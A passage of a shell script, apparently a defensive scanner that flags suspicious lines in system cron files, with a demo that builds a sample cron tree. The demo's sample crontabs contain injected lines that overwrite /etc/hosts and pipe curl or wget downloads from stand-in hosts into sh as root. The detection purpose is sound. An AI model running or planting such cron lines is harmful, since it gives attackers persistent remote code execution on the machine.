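  printf '%s\n' "$line" | grep -Eq '>[[:space:]]*/etc/hosts' && hits="$hits,hosts-overwrite"
  printf '%s' "${hits#,}"
}

# scan_cron_file FILE [SHOWN_NAME] -> "NAME:LINENO:labels" per flagged non-comment line
scan_cron_file() {
  local file="$1" name="${2:-$1}" n=0 line hits
  while IFS= read -r line || [ -n "$line" ]; do
    n=$((n + 1))
    case $line in ''|'#'*) continue ;; esac
    hits=$(check_line "$line")
    if [ -n "$hits" ]; then printf '%s:%d:%s\n' "$name" "$n" "$hits"; fi
  done < "$file"
}

# scan_cron_tree [ROOT] -> scans the usual cron locations under ROOT
# (ROOT empty = live system; a mounted disk image or a test tree also works)
scan_cron_tree() {
  local root="${1:-}" f
  for f in "$root"/etc/crontab "$root"/etc/cron.d/* "$root"/etc/cron.hourly/* \
           "$root"/etc/cron.daily/* "$root"/etc/cron.weekly/* \
           "$root"/etc/cron.monthly/* "$root"/var/spool/cron/* \
           "$root"/var/spool/cron/crontabs/*; do
    if [ -f "$f" ]; then scan_cron_file "$f" "${f#"$root"}"; fi
  done
}

# demo -> builds a constructed cron tree in a temp dir and scans it
demo() {
  local root
  root=$(mktemp -d)
  mkdir -p "$root/etc/cron.d"
  cat > "$root/etc/crontab" <<'EOF'
# constructed sample: one stock entry plus one injected line
17 * * * * root cd / && run-parts --report /etc/cron.hourly
*/7 * * * * root echo "127.0.0.1 localhost" > /etc/hosts; (curl -fsSLk https://host.tor2web.invalid/x) | sh &
EOF
  cat > "$root/etc/cron.d/root" <<'EOF'
0 3 * * * root /usr/bin/freshclam --quiet
*/7 * * * * root wget --quiet --no-check-certificate https://host.example.invalid/x -O - | sh &
EOF
  scan_cron_tree "$root"
  rm -rf "$root"
}

demo
```

Run scan_cron_tree with no argument, as root, to check the live system; every flagged line still needs a manual look, since the rules are heuristics.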